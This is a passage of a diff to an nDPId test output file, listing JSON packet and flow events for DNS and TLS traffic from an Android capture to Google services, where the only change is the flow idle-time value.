00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1582454868462,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1582454868462,"pkt":"xiwDYGpkTGr2n\/YnCABFAABLqjFAAEARCw\/AqAIQwKgCAbfpADUAN\/8RnJ4BAAABAAAAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2dzdGF0aWMDY29tAAABAAE="} 00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868462,"flow_last_seen":1582454868462,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1582454868462,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01590{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3177,"flow_avg_l4_payload_len":397,"midstream":0,"thread_ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","server_names":"*.storage.googleapis.com,*.appspot.com.storage.googleapis.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.googleapis.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.select.googleapis.com,commondatastorage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.storage.googleapis.com","alpn":"http\/1.1","fingerprint":"BA:BA:BA:55:69:9F:E0:BD:48:80:23:A4:B3:AD:C1:FF:EA:4E:17:C9"}} +00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01590{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3177,"flow_avg_l4_payload_len":397,"midstream":0,"thread_ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","server_names":"*.storage.googleapis.com,*.appspot.com.storage.googleapis.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.googleapis.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.select.googleapis.com,commondatastorage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.storage.googleapis.com","alpn":"http\/1.1","fingerprint":"BA:BA:BA:55:69:9F:E0:BD:48:80:23:A4:B3:AD:C1:FF:EA:4E:17:C9"}} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1582454868503,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1582454868503,"pkt":"TGr2n\/YnxiwDYGpkCABFAABbmZAAAEARW6DAqAIBwKgCEAA1t+kAR93wnJ6BgAABAAEAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2dzdGF0aWMDY29tAAABAAHADAABAAEAAACxAASs2RID"} 00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454868462,"flow_last_seen":1582454868503,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1582454868503,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.gstatic.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.18.3"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868511,"flow_last_seen":1582454868511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868511,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1582454868511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868511,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8PG9AAEAGfLjAqAIQrNkSA5AYAbuCdQgsAAAAAKAC\/\/91sgAAAgQFtAQCCAr\/\/zRDAAAAAAEDAwg="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868527,"flow_last_seen":1582454868527,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868527,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1582454868527,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868527,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8stVAAEAGBlLAqAIQrNkSA5AaAbtdpoaTAAAAAKAC\/\/8cFQAAAgQFtAQCCAr\/\/zRGAAAAAAEDAwg="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1582454868559,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868559,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8mn0AAHYGKKqs2RIDwKgCEAG7kBpu4mZiXaaGlKAS6yC\/LgAAAgQFZAQCCApPRk15\/\/80RgEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1582454868563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868563,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0stZAAEAGBlnAqAIQrNkSA5AaAbtdpoaUbuJmY4AQAVfXbAAAAQEICv\/\/NE9PRk15"} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868527,"flow_last_seen":1582454868563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454868563,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868511,"flow_last_seen":1582454868511,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868511,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1582454868511,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868511,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8PG9AAEAGfLjAqAIQrNkSA5AYAbuCdQgsAAAAAKAC\/\/91sgAAAgQFtAQCCAr\/\/zRDAAAAAAEDAwg="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868527,"flow_last_seen":1582454868527,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868527,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1582454868527,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868527,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8stVAAEAGBlLAqAIQrNkSA5AaAbtdpoaTAAAAAKAC\/\/8cFQAAAgQFtAQCCAr\/\/zRGAAAAAAEDAwg="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1582454868559,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868559,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8mn0AAHYGKKqs2RIDwKgCEAG7kBpu4mZiXaaGlKAS6yC\/LgAAAgQFZAQCCApPRk15\/\/80RgEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1582454868563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868563,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0stZAAEAGBlnAqAIQrNkSA5AaAbtdpoaUbuJmY4AQAVfXbAAAAQEICv\/\/NE9PRk15"} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868527,"flow_last_seen":1582454868563,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454868563,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1582454868597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454868597,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBqkFAAEARCwnAqAIQwKgCAcjmADUALYwU2tsBAAABAAAAAAAAD2FwcC1tZWFzdXJlbWVudANjb20AAAEAAQ=="} 00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1582454868597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454868597,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRZjUAAEARjwXAqAIBwKgCEAA1yOYAPQ9d2tuBgAABAAEAAAAAD2FwcC1tZWFzdXJlbWVudANjb20AAAEAAcAMAAEAAQAAAEEABKzZqM4="} 00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.168.206"}} -00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":144,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -02253{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":146,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3903,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","alpn":"http\/1.1","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}} +00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":144,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +02253{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":146,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3903,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","alpn":"http\/1.1","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}} 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1582454868606,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":114,"pkt_l4_len":60,"thread_ts_msec":1582454868606,"pkt":"MzMAAQACTGr2n\/Ynht1gBNipADwRAf6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAQACAiICIwA8Uc8B2OT+AAEADgABAAEl5RSOTGr2n\/YnAAMADA4ACMoAAAAAAAAAAAAIAAIAAAAGAAQAFwAY"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1582454868843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868843,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8fo0AAHYGRJqs2RIDwKgCEAG7kBjGuYRJgnUILaAS6yAZNAAAAgQFZAQCCApRt9Th\/\/80QwEDAwg="} 